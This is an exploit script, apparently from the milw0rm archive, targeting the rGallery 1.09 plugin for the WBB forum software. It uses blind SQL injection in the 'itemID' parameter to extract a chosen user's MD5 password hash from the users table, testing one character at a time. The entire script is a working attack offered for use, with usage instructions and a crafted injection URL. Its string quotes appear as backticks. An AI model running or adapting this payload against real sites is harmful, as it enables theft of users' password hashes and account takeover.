WBB Plugin rGallery 1.09 (itemID) Blind SQL Injection Exploitimport sys, urllib2, re

print `\n `
print `                          \\#'#/                        `
print `                          (-.-)                         `
print `  -------------------oOO---(_)---OOo--------------------`
print `  |   rGallery 1.09 (+-) Exploit by Five-Three-Nine    |`
print `  |  Using Blind SQL Injection in 'itemID' of rGallery |`
print `  |                                                    |`
print `  |                Greets and Shouts to:               |`
print `  | tmh, n00bor, activebeta, Ghost, Saufkumpel, Altair |`  
print `  | crusader727, Nemo, Loader007, J0hn.X3r, sNiper109  |`                                      
print `  ------------------------------------------------------\n`


if len(sys.argv) != 5:
	print `\nUsage: ./rGallery.py <UserID> <UserTable> <ImageID> <site>`
	print `Ex: ./rGallery.py 1 bb1_users 19 http://example.com\n`
	sys.exit(1)

UserID = sys.argv[1]
Prefix = sys.argv[2]
ImageID = sys.argv[3]
Host = sys.argv[4]

Res = [48,49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102]
MD5 = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32]
Hash = ``

UserID = int(UserID)
UserID -= 1
UserID = str(UserID)

for MD5Count in range(32):
	for ResCount in range(16):
		try:
			source = urllib2.urlopen(Host +`/index.php?page=RGalleryImageWrapper&amp;itemID=` + ImageID +`%20and%20ascii(substring((SELECT%20password%20from%20` + Prefix +`%20limit%20`+ UserID + `,1),` + str(MD5Count + 1) + `,1))=`+ str(Res[ResCount])).read()
			
			print `[+] Character ` + str(MD5Count + 1) +  ` found! ` + str(Res[ResCount])
			MD5[MD5Count] = Res[ResCount]
			break
		except(urllib2.URLError):
			continue 
		except(urllib2.HTTPError):
			print `[+] Error: Can't load the Site`
			sys.exit(1)


for i in MD5:
	Hash = Hash + str(chr(i))
	
print `\n[+] Hash: ` + Hash

# milw0rm.com [2008-10-20]